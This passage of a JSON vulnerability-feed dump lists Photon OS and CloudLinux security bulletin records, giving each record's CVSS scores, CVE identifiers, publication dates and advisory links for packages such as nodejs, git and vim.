"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-12-09T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-4.0-0294", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3565", "CVE-2023-34060"], "modified": "2022-12-09T00:00:00", "id": "PHSA-2022-4.0-0294", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-294", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:43:56", "description": "Updates of ['powershell'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-11-03T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0274", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23267", "CVE-2023-34060"], "modified": "2022-11-03T00:00:00", "id": "PHSA-2022-4.0-0274", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-274", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:44:16", "description": "Updates of ['nodejs'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-10-12T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-4.0-0262", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-32213", "CVE-2023-34060"], "modified": "2022-10-12T00:00:00", "id": "PHSA-2022-4.0-0262", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:51:06", "description": "Updates of ['ruby'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-08-20T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0084", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32066", "CVE-2023-34060"], "modified": "2021-08-20T00:00:00", "id": "PHSA-2021-4.0-0084", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-84", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:52:12", "description": "Updates of ['tcl'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-07-19T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0062", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35331", "CVE-2023-34060"], "modified": "2021-07-19T00:00:00", "id": "PHSA-2021-4.0-0062", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-62", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:02", "description": "Updates of ['python3'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-4.0-0028", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29921", "CVE-2023-34060"], "modified": "2021-05-19T00:00:00", "id": "PHSA-2021-4.0-0028", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:53:42", "description": "Updates of ['tmux'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-05-18T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2021-4.0-0026", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27347", "CVE-2023-34060"], "modified": "2021-05-18T00:00:00", "id": "PHSA-2021-4.0-0026", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:54:20", "description": "Updates of ['wpa_supplicant'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2021-04-24T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2021-4.0-0014", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30004", "CVE-2023-34060"], "modified": "2021-04-24T00:00:00", "id": "PHSA-2021-4.0-0014", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:45:45", "description": "Updates of ['libxml2'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-12T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0227", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2309", "CVE-2023-34060"], "modified": "2022-08-12T00:00:00", "id": "PHSA-2022-4.0-0227", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-227", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:47:11", "description": "Updates of ['openldap'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-22T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2022-4.0-0188", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29155", "CVE-2023-34060"], "modified": "2022-05-22T00:00:00", "id": "PHSA-2022-4.0-0188", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-188", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:13", "description": "Updates of ['postgresql'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-23T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-3.0-0441", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2625", "CVE-2023-34060"], "modified": "2022-08-23T00:00:00", "id": "PHSA-2022-3.0-0441", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-441", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:04:57", "description": "Updates of ['ImageMagick'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-26T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-3.0-0443", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2719", "CVE-2023-34060"], "modified": "2022-08-26T00:00:00", "id": "PHSA-2022-3.0-0443", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:04:09", "description": "Updates of ['kafka'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-10-19T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-3.0-0471", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-34917", "CVE-2023-34060"], "modified": "2022-10-19T00:00:00", "id": "PHSA-2022-3.0-0471", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-471", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:56:17", "description": "Updates of ['tornado'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2023-10-07T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2023-3.0-0663", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28370", "CVE-2023-34060"], "modified": "2023-10-07T00:00:00", "id": "PHSA-2023-3.0-0663", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-663", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:51", "description": "Updates of ['vim'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-08-03T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-3.0-0429", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2231", "CVE-2023-34060"], "modified": "2022-08-03T00:00:00", "id": "PHSA-2022-3.0-0429", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-429", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:41", "description": "Updates of ['gnupg'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-07-29T00:00:00", "type": "photon", "title": "Moderate Photon OS Security Update - PHSA-2022-3.0-0428", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-34903", "CVE-2023-34060"], "modified": "2022-07-29T00:00:00", "id": "PHSA-2022-3.0-0428", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T18:05:38", "description": "Updates of ['lua'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-07-16T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-3.0-0422", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-33099", "CVE-2023-34060"], "modified": "2022-07-16T00:00:00", "id": "PHSA-2022-3.0-0422", "href": "https://github.com/vmware/photon/wiki/Security-Update-3.0-422", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T17:47:17", "description": "Updates of ['git'] packages of Photon OS have been released.\n", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2022-05-17T00:00:00", "type": "photon", "title": "Important Photon OS Security Update - PHSA-2022-4.0-0184", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24765", "CVE-2023-34060"], "modified": "2022-05-17T00:00:00", "id": "PHSA-2022-4.0-0184", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-184", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudlinux": [{"lastseen": "2021-11-26T18:38:49", "description": "- CVE-2021-3872: fix illegal memory access if buffer name is very long\n- CVE-2021-3875: fix ml_get error after search with range\n- CVE-2021-3903: fix invalid memory access when scrolling without a valid screen", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-10T18:26:51", "type": "cloudlinux", "title": "Fix of CVE: CVE-2021-3875, CVE-2021-3872, CVE-2021-3903", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3903"], "modified": "2021-11-10T18:26:51", "id": "CLSA-2021:1636568811", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T00:44:22", "description": "- CVE-2021-3872: fix illegal memory access if buffer name is very long\n- CVE-2021-3875: fix ml_get error after search with range\n- CVE-2021-3903: fix invalid memory access when scrolling without a valid screen", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "source": "security@huntr.dev", "type": "Secondary", "impactScore": 5.9}, "published": "2021-11-23T13:12:30", "type": "cloudlinux", "title": "Fix of CVE: CVE-2021-3903, CVE-2021-3875, CVE-2021-3872", "bulletinFamily": "unix", "cvss2": {"baseSeverity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3872", "CVE-2021-3875", "CVE-2021-3903"], "modified": 